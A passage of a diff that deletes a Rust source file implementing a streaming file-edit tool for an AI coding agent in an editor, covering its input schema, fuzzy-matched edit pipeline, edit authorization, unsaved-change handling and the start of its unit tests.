Task, WeakEntity}; -use language::language_settings::{self, FormatOnSave}; -use language::{Buffer, LanguageRegistry}; -use language_model::LanguageModelToolResultContent; -use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use project::{AgentLocation, Project, ProjectPath}; -use schemars::JsonSchema; -use serde::{ - Deserialize, Deserializer, Serialize, - de::{DeserializeOwned, Error as _}, -}; -use std::ops::Range; -use std::path::PathBuf; -use std::sync::Arc; -use streaming_diff::{CharOperation, StreamingDiff}; -use text::ToOffset; -use ui::SharedString; -use util::rel_path::RelPath; -use util::{Deferred, ResultExt}; - -const DEFAULT_UI_TEXT: &str = "Editing file"; - -/// This is a tool for creating a new file or editing an existing file. For moving or renaming files, you should generally use the `move_path` tool instead. -/// -/// Before using this tool: -/// -/// 1. Use the `read_file` tool to understand the file's contents and context -/// -/// 2. Verify the directory path is correct (only applicable when creating new files): -/// - Use the `list_directory` tool to verify the parent directory exists and is the correct location -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct StreamingEditFileToolInput { - /// A one-line, user-friendly markdown description of the edit. This will be shown in the UI. - /// - /// Be terse, but also descriptive in what you want to achieve with this edit. Avoid generic instructions. - /// - /// NEVER mention the file path in this description. - /// - /// Fix API endpoint URLs - /// Update copyright year in `page_footer` - /// - /// Make sure to include this field before all the others in the input object so that we can display it immediately. - pub display_description: String, - - /// The full path of the file to create or modify in the project. - /// - /// WARNING: When specifying which file path need changing, you MUST start each path with one of the project's root directories. 
- /// - /// The following examples assume we have two root directories in the project: - /// - /a/b/backend - /// - /c/d/frontend - /// - /// - /// `backend/src/main.rs` - /// - /// Notice how the file path starts with `backend`. Without that, the path would be ambiguous and the call would fail! - /// - /// - /// - /// `frontend/db.js` - /// - pub path: PathBuf, - - /// The mode of operation on the file. Possible values: - /// - 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field. - /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. - /// - /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. - #[serde(deserialize_with = "deserialize_maybe_stringified")] - pub mode: StreamingEditFileMode, - - /// The complete content for the new file (required for 'write' mode). - /// This field should contain the entire file content. - #[serde(default, skip_serializing_if = "Option::is_none")] - pub content: Option, - - /// List of edit operations to apply sequentially (required for 'edit' mode). - /// Each edit finds `old_text` in the file and replaces it with `new_text`. - #[serde( - default, - skip_serializing_if = "Option::is_none", - deserialize_with = "deserialize_maybe_stringified" - )] - pub edits: Option>, -} - -#[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] -#[serde(rename_all = "snake_case")] -pub enum StreamingEditFileMode { - /// Overwrite the file with new content (replacing any existing content). - /// If the file does not exist, it will be created. - Write, - /// Make granular edits to an existing file - Edit, -} - -/// A single edit operation that replaces old text with new text -/// Properly escape all text fields as valid JSON strings. -/// Remember to escape special characters like newlines (`\n`) and quotes (`"`) in JSON strings. 
-#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct Edit { - /// The exact text to find in the file. This will be matched using fuzzy matching - /// to handle minor differences in whitespace or formatting. - /// - /// Be minimal with replacements: - /// - For unique lines, include only those lines - /// - For non-unique lines, include enough context to identify them - pub old_text: String, - /// The text to replace it with - pub new_text: String, -} - -#[derive(Clone, Default, Debug, Deserialize)] -struct StreamingEditFileToolPartialInput { - #[serde(default)] - display_description: Option, - #[serde(default)] - path: Option, - #[serde(default, deserialize_with = "deserialize_maybe_stringified")] - mode: Option, - #[serde(default)] - content: Option, - #[serde(default, deserialize_with = "deserialize_maybe_stringified")] - edits: Option>, -} - -#[derive(Clone, Default, Debug, Deserialize)] -pub struct PartialEdit { - #[serde(default)] - pub old_text: Option, - #[serde(default)] - pub new_text: Option, -} - -#[derive(Deserialize)] -#[serde(untagged)] -enum ValueOrJsonString { - Value(T), - String(String), -} - -fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result -where - T: DeserializeOwned, - D: Deserializer<'de>, -{ - match ValueOrJsonString::::deserialize(deserializer)? 
{ - ValueOrJsonString::Value(value) => Ok(value), - ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { - D::Error::custom(format!("failed to parse stringified value: {error}")) - }), - } -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(untagged)] -pub enum StreamingEditFileToolOutput { - Success { - #[serde(alias = "original_path")] - input_path: PathBuf, - new_text: String, - old_text: Arc, - #[serde(default)] - diff: String, - }, - Error { - error: String, - #[serde(default, skip_serializing_if = "Option::is_none")] - input_path: Option, - #[serde(default, skip_serializing_if = "String::is_empty")] - diff: String, - }, -} - -impl StreamingEditFileToolOutput { - pub fn error(error: impl Into) -> Self { - Self::Error { - error: error.into(), - input_path: None, - diff: String::new(), - } - } -} - -impl std::fmt::Display for StreamingEditFileToolOutput { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - StreamingEditFileToolOutput::Success { - diff, input_path, .. 
- } => { - if diff.is_empty() { - write!(f, "No edits were made.") - } else { - write!( - f, - "Edited {}:\n\n```diff\n{diff}\n```", - input_path.display() - ) - } - } - StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } => { - write!(f, "{error}\n")?; - if let Some(input_path) = input_path - && !diff.is_empty() - { - write!( - f, - "Edited {}:\n\n```diff\n{diff}\n```", - input_path.display() - ) - } else { - write!(f, "No edits were made.") - } - } - } - } -} - -impl From for LanguageModelToolResultContent { - fn from(output: StreamingEditFileToolOutput) -> Self { - output.to_string().into() - } -} - -pub struct StreamingEditFileTool { - project: Entity, - thread: WeakEntity, - action_log: Entity, - language_registry: Arc, -} - -enum EditSessionResult { - Completed(EditSession), - Failed { - error: String, - session: Option, - }, -} - -impl StreamingEditFileTool { - pub fn new( - project: Entity, - thread: WeakEntity, - action_log: Entity, - language_registry: Arc, - ) -> Self { - Self { - project, - thread, - action_log, - language_registry, - } - } - - fn authorize( - &self, - path: &PathBuf, - description: &str, - event_stream: &ToolCallEventStream, - cx: &mut App, - ) -> Task> { - super::tool_permissions::authorize_file_edit( - EditFileTool::NAME, - path, - description, - &self.thread, - event_stream, - cx, - ) - } - - fn set_agent_location(&self, buffer: WeakEntity, position: text::Anchor, cx: &mut App) { - let should_update_agent_location = self - .thread - .read_with(cx, |thread, _cx| !thread.is_subagent()) - .unwrap_or_default(); - if should_update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location(Some(AgentLocation { buffer, position }), cx); - }); - } - } - - async fn ensure_buffer_saved(&self, buffer: &Entity, cx: &mut AsyncApp) { - let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); - 
settings.format_on_save != FormatOnSave::Off - }); - - if format_on_save_enabled { - self.project - .update(cx, |project, cx| { - project.format( - HashSet::from_iter([buffer.clone()]), - LspFormatTarget::Buffers, - false, - FormatTrigger::Save, - cx, - ) - }) - .await - .log_err(); - } - - self.project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await - .log_err(); - - self.action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - } - - async fn process_streaming_edits( - &self, - input: &mut ToolInput, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> EditSessionResult { - let mut session: Option = None; - let mut last_partial: Option = None; - - loop { - futures::select! { - payload = input.next().fuse() => { - match payload { - Ok(payload) => match payload { - ToolInputPayload::Partial(partial) => { - if let Ok(parsed) = serde_json::from_value::(partial) { - let path_complete = parsed.path.is_some() - && parsed.path.as_ref() == last_partial.as_ref().and_then(|partial| partial.path.as_ref()); - - last_partial = Some(parsed.clone()); - - if session.is_none() - && path_complete - && let StreamingEditFileToolPartialInput { - path: Some(path), - display_description: Some(display_description), - mode: Some(mode), - .. 
- } = &parsed - { - match EditSession::new( - PathBuf::from(path), - display_description, - *mode, - self, - event_stream, - cx, - ) - .await - { - Ok(created_session) => session = Some(created_session), - Err(error) => { - log::error!("Failed to create edit session: {}", error); - return EditSessionResult::Failed { - error, - session: None, - }; - } - } - } - - if let Some(current_session) = &mut session - && let Err(error) = current_session.process(parsed, self, event_stream, cx) - { - log::error!("Failed to process edit: {}", error); - return EditSessionResult::Failed { error, session }; - } - } - } - ToolInputPayload::Full(full_input) => { - let mut session = if let Some(session) = session { - session - } else { - match EditSession::new( - full_input.path.clone(), - &full_input.display_description, - full_input.mode, - self, - event_stream, - cx, - ) - .await - { - Ok(created_session) => created_session, - Err(error) => { - log::error!("Failed to create edit session: {}", error); - return EditSessionResult::Failed { - error, - session: None, - }; - } - } - }; - - return match session.finalize(full_input, self, event_stream, cx).await { - Ok(()) => EditSessionResult::Completed(session), - Err(error) => { - log::error!("Failed to finalize edit: {}", error); - EditSessionResult::Failed { - error, - session: Some(session), - } - } - }; - } - ToolInputPayload::InvalidJson { error_message } => { - log::error!("Received invalid JSON: {error_message}"); - return EditSessionResult::Failed { - error: error_message, - session, - }; - } - }, - Err(error) => { - return EditSessionResult::Failed { - error: format!("Failed to receive tool input: {error}"), - session, - }; - } - } - } - _ = event_stream.cancelled_by_user().fuse() => { - return EditSessionResult::Failed { - error: "Edit cancelled by user".to_string(), - session, - }; - } - } - } - } -} - -impl AgentTool for StreamingEditFileTool { - type Input = StreamingEditFileToolInput; - type Output = 
StreamingEditFileToolOutput; - - const NAME: &'static str = "streaming_edit_file"; - - fn supports_input_streaming() -> bool { - true - } - - fn kind() -> acp::ToolKind { - acp::ToolKind::Edit - } - - fn initial_title( - &self, - input: Result, - cx: &mut App, - ) -> SharedString { - match input { - Ok(input) => self - .project - .read(cx) - .find_project_path(&input.path, cx) - .and_then(|project_path| { - self.project - .read(cx) - .short_full_path_for_project_path(&project_path, cx) - }) - .unwrap_or(input.path.to_string_lossy().into_owned()) - .into(), - Err(raw_input) => { - if let Ok(input) = - serde_json::from_value::(raw_input) - { - let path = input.path.unwrap_or_default(); - let path = path.trim(); - if !path.is_empty() { - return self - .project - .read(cx) - .find_project_path(&path, cx) - .and_then(|project_path| { - self.project - .read(cx) - .short_full_path_for_project_path(&project_path, cx) - }) - .unwrap_or_else(|| path.to_string()) - .into(); - } - - let description = input.display_description.unwrap_or_default(); - let description = description.trim(); - if !description.is_empty() { - return description.to_string().into(); - } - } - - DEFAULT_UI_TEXT.into() - } - } - } - - fn run( - self: Arc, - mut input: ToolInput, - event_stream: ToolCallEventStream, - cx: &mut App, - ) -> Task> { - cx.spawn(async move |cx: &mut AsyncApp| { - match self - .process_streaming_edits(&mut input, &event_stream, cx) - .await - { - EditSessionResult::Completed(session) => { - self.ensure_buffer_saved(&session.buffer, cx).await; - let (new_text, diff) = session.compute_new_text_and_diff(cx).await; - Ok(StreamingEditFileToolOutput::Success { - old_text: session.old_text.clone(), - new_text, - input_path: session.input_path, - diff, - }) - } - EditSessionResult::Failed { - error, - session: Some(session), - } => { - self.ensure_buffer_saved(&session.buffer, cx).await; - let (_new_text, diff) = session.compute_new_text_and_diff(cx).await; - 
Err(StreamingEditFileToolOutput::Error { - error, - input_path: Some(session.input_path), - diff, - }) - } - EditSessionResult::Failed { - error, - session: None, - } => Err(StreamingEditFileToolOutput::Error { - error, - input_path: None, - diff: String::new(), - }), - } - }) - } - - fn replay( - &self, - _input: Self::Input, - output: Self::Output, - event_stream: ToolCallEventStream, - cx: &mut App, - ) -> Result<()> { - match output { - StreamingEditFileToolOutput::Success { - input_path, - old_text, - new_text, - .. - } => { - event_stream.update_diff(cx.new(|cx| { - Diff::finalized( - input_path.to_string_lossy().into_owned(), - Some(old_text.to_string()), - new_text, - self.language_registry.clone(), - cx, - ) - })); - Ok(()) - } - StreamingEditFileToolOutput::Error { .. } => Ok(()), - } - } -} - -pub struct EditSession { - abs_path: PathBuf, - input_path: PathBuf, - buffer: Entity, - old_text: Arc, - diff: Entity, - mode: StreamingEditFileMode, - parser: ToolEditParser, - pipeline: EditPipeline, - file_changed_since_last_read: bool, - _finalize_diff_guard: Deferred>, -} - -struct EditPipeline { - current_edit: Option, - content_written: bool, -} - -enum EditPipelineEntry { - ResolvingOldText { - matcher: StreamingFuzzyMatcher, - }, - StreamingNewText { - streaming_diff: StreamingDiff, - edit_cursor: usize, - reindenter: Reindenter, - original_snapshot: text::BufferSnapshot, - }, -} - -impl EditPipeline { - fn new() -> Self { - Self { - current_edit: None, - content_written: false, - } - } - - fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { - if self.current_edit.is_none() { - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); - self.current_edit = Some(EditPipelineEntry::ResolvingOldText { - matcher: StreamingFuzzyMatcher::new(snapshot), - }); - } - } -} - -impl EditSession { - async fn new( - path: PathBuf, - display_description: &str, - mode: StreamingEditFileMode, - tool: &StreamingEditFileTool, - 
event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result { - let project_path = cx.update(|cx| resolve_path(mode, &path, &tool.project, cx))?; - - let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) - else { - return Err(format!( - "Worktree at '{}' does not exist", - path.to_string_lossy() - )); - }; - - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), - ); - - cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) - .await - .map_err(|e| e.to_string())?; - - let buffer = tool - .project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .map_err(|e| e.to_string())?; - - let file_changed_since_last_read = ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - - let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); - event_stream.update_diff(diff.clone()); - let finalize_diff_guard = util::defer(Box::new({ - let diff = diff.downgrade(); - let mut cx = cx.clone(); - move || { - diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); - } - }) as Box); - - tool.action_log.update(cx, |log, cx| match mode { - StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx), - StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx), - }); - - let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let old_text = cx - .background_spawn({ - let old_snapshot = old_snapshot.clone(); - async move { Arc::new(old_snapshot.text()) } - }) - .await; - - Ok(Self { - abs_path, - input_path: path, - buffer, - old_text, - diff, - mode, - parser: ToolEditParser::default(), - pipeline: EditPipeline::new(), - file_changed_since_last_read, - _finalize_diff_guard: finalize_diff_guard, - }) - } - - async fn finalize( - &mut self, - input: StreamingEditFileToolInput, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - 
match input.mode { - StreamingEditFileMode::Write => { - let content = input - .content - .ok_or_else(|| "'content' field is required for write mode".to_string())?; - - let events = self.parser.finalize_content(&content); - self.process_events(&events, tool, event_stream, cx)?; - } - StreamingEditFileMode::Edit => { - let edits = input - .edits - .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; - let events = self.parser.finalize_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; - - if log::log_enabled!(log::Level::Debug) { - log::debug!("Got edits:"); - for edit in &edits { - log::debug!( - " old_text: '{}', new_text: '{}'", - edit.old_text.replace('\n', "\\n"), - edit.new_text.replace('\n', "\\n") - ); - } - } - } - } - Ok(()) - } - - async fn compute_new_text_and_diff(&self, cx: &mut AsyncApp) -> (String, String) { - let new_snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let (new_text, unified_diff) = cx - .background_spawn({ - let new_snapshot = new_snapshot.clone(); - let old_text = self.old_text.clone(); - async move { - let new_text = new_snapshot.text(); - let diff = language::unified_diff(&old_text, &new_text); - (new_text, diff) - } - }) - .await; - (new_text, unified_diff) - } - - fn process( - &mut self, - partial: StreamingEditFileToolPartialInput, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - match &self.mode { - StreamingEditFileMode::Write => { - if let Some(content) = &partial.content { - let events = self.parser.push_content(content); - self.process_events(&events, tool, event_stream, cx)?; - } - } - StreamingEditFileMode::Edit => { - if let Some(edits) = partial.edits { - let events = self.parser.push_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; - } - } - } - Ok(()) - } - - fn process_events( - &mut self, - events: &[ToolEditEvent], - tool: &StreamingEditFileTool, - 
event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - for event in events { - match event { - ToolEditEvent::ContentChunk { chunk } => { - let (buffer_id, buffer_len) = self - .buffer - .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); - let edit_range = if self.pipeline.content_written { - buffer_len..buffer_len - } else { - 0..buffer_len - }; - - agent_edit_buffer( - &self.buffer, - [(edit_range, chunk.as_str())], - &tool.action_log, - cx, - ); - cx.update(|cx| { - tool.set_agent_location( - self.buffer.downgrade(), - text::Anchor::max_for_buffer(buffer_id), - cx, - ); - }); - self.pipeline.content_written = true; - } - - ToolEditEvent::OldTextChunk { - chunk, done: false, .. - } => { - log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - && !chunk.is_empty() - { - if let Some(match_range) = matcher.push(chunk, None) { - let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_outside(match_range.clone()) - }); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(match_range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - } - } - - ToolEditEvent::OldTextChunk { - edit_index, - chunk, - done: true, - } => { - log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); - - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - else { - continue; - }; - - if !chunk.is_empty() { - matcher.push(chunk, None); - } - let range = extract_match( - matcher.finish(), - &self.buffer, - edit_index, - self.file_changed_since_last_read, - cx, - )?; - - let anchor_range = self - .buffer - .read_with(cx, 
|buffer, _cx| buffer.anchor_range_outside(range.clone())); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - let line = snapshot.offset_to_point(range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ - ToolCallLocation::new(&self.abs_path).line(Some(line)), - ]), - ); - - let buffer_indent = snapshot.line_indent_for_row(line); - let query_indent = text::LineIndent::from_iter( - matcher - .query_lines() - .first() - .map(|s| s.as_str()) - .unwrap_or("") - .chars(), - ); - let indent_delta = compute_indent_delta(buffer_indent, query_indent); - - let old_text_in_buffer = - snapshot.text_for_range(range.clone()).collect::(); - - log::debug!( - "edit[{}] old_text matched at {}..{}: {:?}", - edit_index, - range.start, - range.end, - old_text_in_buffer, - ); - - let text_snapshot = self - .buffer - .read_with(cx, |buffer, _cx| buffer.text_snapshot()); - self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { - streaming_diff: StreamingDiff::new(old_text_in_buffer), - edit_cursor: range.start, - reindenter: Reindenter::new(indent_delta), - original_snapshot: text_snapshot, - }); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: false, .. - } => { - log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - streaming_diff, - edit_cursor, - reindenter, - original_snapshot, - .. 
- }) = &mut self.pipeline.current_edit - else { - continue; - }; - - let reindented = reindenter.push(chunk); - if reindented.is_empty() { - continue; - } - - let char_ops = streaming_diff.push_new(&reindented); - apply_char_operations( - &char_ops, - &self.buffer, - original_snapshot, - edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(*edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: true, .. - } => { - log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - mut streaming_diff, - mut edit_cursor, - mut reindenter, - original_snapshot, - }) = self.pipeline.current_edit.take() - else { - continue; - }; - - // Flush any remaining reindent buffer + final chunk. - let mut final_text = reindenter.push(chunk); - final_text.push_str(&reindenter.finish()); - - log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); - - if !final_text.is_empty() { - let char_ops = streaming_diff.push_new(&final_text); - apply_char_operations( - &char_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, - cx, - ); - } - - let remaining_ops = streaming_diff.finish(); - apply_char_operations( - &remaining_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - } - } - Ok(()) - } -} - -fn apply_char_operations( - ops: &[CharOperation], - buffer: &Entity, - snapshot: &text::BufferSnapshot, - edit_cursor: &mut usize, - action_log: &Entity, - cx: &mut AsyncApp, -) { - for op in ops { - match op { - CharOperation::Insert { text } => { - let anchor = snapshot.anchor_after(*edit_cursor); - agent_edit_buffer(&buffer, [(anchor..anchor, text.as_str())], 
action_log, cx); - } - CharOperation::Delete { bytes } => { - let delete_end = *edit_cursor + bytes; - let anchor_range = snapshot.anchor_range_inside(*edit_cursor..delete_end); - agent_edit_buffer(&buffer, [(anchor_range, "")], action_log, cx); - *edit_cursor = delete_end; - } - CharOperation::Keep { bytes } => { - *edit_cursor += bytes; - } - } - } -} - -fn extract_match( - matches: Vec>, - buffer: &Entity, - edit_index: &usize, - file_changed_since_last_read: bool, - cx: &mut AsyncApp, -) -> Result, String> { - let file_changed_since_last_read_message = if file_changed_since_last_read { - " The file has changed on disk since you last read it." - } else { - "" - }; - - match matches.len() { - 0 => Err(format!( - "Could not find matching text for edit at index {}. \ - The old_text did not match any content in the file.{} \ - Please read the file again to get the current content.", - edit_index, file_changed_since_last_read_message, - )), - 1 => Ok(matches.into_iter().next().unwrap()), - _ => { - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let lines = matches - .iter() - .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) - .collect::>() - .join(", "); - Err(format!( - "Edit {} matched multiple locations in the file at lines: {}. \ - Please provide more context in old_text to uniquely \ - identify the location.", - edit_index, lines - )) - } - } -} - -/// Edits a buffer and reports the edit to the action log in the same effect -/// cycle. This ensures the action log's subscription handler sees the version -/// already updated by `buffer_edited`, so it does not misattribute the agent's -/// edit as a user edit. 
-fn agent_edit_buffer( - buffer: &Entity, - edits: I, - action_log: &Entity, - cx: &mut AsyncApp, -) where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, -{ - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); -} - -fn ensure_buffer_saved( - buffer: &Entity, - abs_path: &PathBuf, - tool: &StreamingEditFileTool, - cx: &mut AsyncApp, -) -> Result { - let last_read_mtime = tool - .action_log - .read_with(cx, |log, _| log.file_read_time(abs_path)); - let check_result = tool.thread.read_with(cx, |thread, cx| { - let current = buffer - .read(cx) - .file() - .and_then(|file| file.disk_state().mtime()); - let dirty = buffer.read(cx).is_dirty(); - let has_save = thread.has_tool(SaveFileTool::NAME); - let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (current, dirty, has_save, has_restore) - }); - - let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { - return Ok(false); - }; - - if is_dirty { - let message = match (has_save_tool, has_restore_tool) { - (true, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (true, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." - } - (false, true) => { - "This file has unsaved changes. 
Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (false, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ - then ask them to save or revert the file manually and inform you when it's ok to proceed." - } - }; - return Err(message.to_string()); - } - - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) - && current != last_read - { - return Ok(true); - } - - Ok(false) -} - -fn resolve_path( - mode: StreamingEditFileMode, - path: &PathBuf, - project: &Entity, - cx: &mut App, -) -> Result { - let project = project.read(cx); - - match mode { - StreamingEditFileMode::Edit => { - let path = project - .find_project_path(&path, cx) - .ok_or_else(|| "Can't edit file: path not found".to_string())?; - - let entry = project - .entry_for_path(&path, cx) - .ok_or_else(|| "Can't edit file: path not found".to_string())?; - - if entry.is_file() { - Ok(path) - } else { - Err("Can't edit file: path is a directory".to_string()) - } - } - StreamingEditFileMode::Write => { - if let Some(path) = project.find_project_path(&path, cx) - && let Some(entry) = project.entry_for_path(&path, cx) - { - if entry.is_file() { - return Ok(path); - } else { - return Err("Can't write to file: path is a directory".to_string()); - } - } - - let parent_path = path - .parent() - .ok_or_else(|| "Can't create file: incorrect path".to_string())?; - - let parent_project_path = project.find_project_path(&parent_path, cx); - - let parent_entry = parent_project_path - .as_ref() - .and_then(|path| project.entry_for_path(path, cx)) - .ok_or_else(|| "Can't create file: parent directory doesn't exist")?; - - if !parent_entry.is_dir() { - return 
Err("Can't create file: parent is not a directory".to_string()); - } - - let file_name = path - .file_name() - .and_then(|file_name| file_name.to_str()) - .and_then(|file_name| RelPath::unix(file_name).ok()) - .ok_or_else(|| "Can't create file: invalid filename".to_string())?; - - let new_file_path = parent_project_path.map(|parent| ProjectPath { - path: parent.path.join(file_name), - ..parent - }); - - new_file_path.ok_or_else(|| "Can't create file".to_string()) - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::{ContextServerRegistry, Templates, ToolInputSender}; - use fs::Fs as _; - use futures::StreamExt as _; - use gpui::{TestAppContext, UpdateGlobal}; - use language_model::fake_provider::FakeLanguageModel; - use prompt_store::ProjectContext; - use serde_json::json; - use settings::Settings; - use settings::SettingsStore; - use util::path; - use util::rel_path::rel_path; - - #[gpui::test] - async fn test_streaming_edit_create_file(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Create new file".into(), - path: "root/dir/new_file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("Hello, World!".into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, diff, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "Hello, World!"); - assert!(!diff.is_empty()); - } - - #[gpui::test] - async fn test_streaming_edit_overwrite_file(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "old content"})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Overwrite file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("new content".into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new content"); - assert_eq!(*old_text, "old content"); - } - - #[gpui::test] - async fn test_streaming_edit_granular_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. 
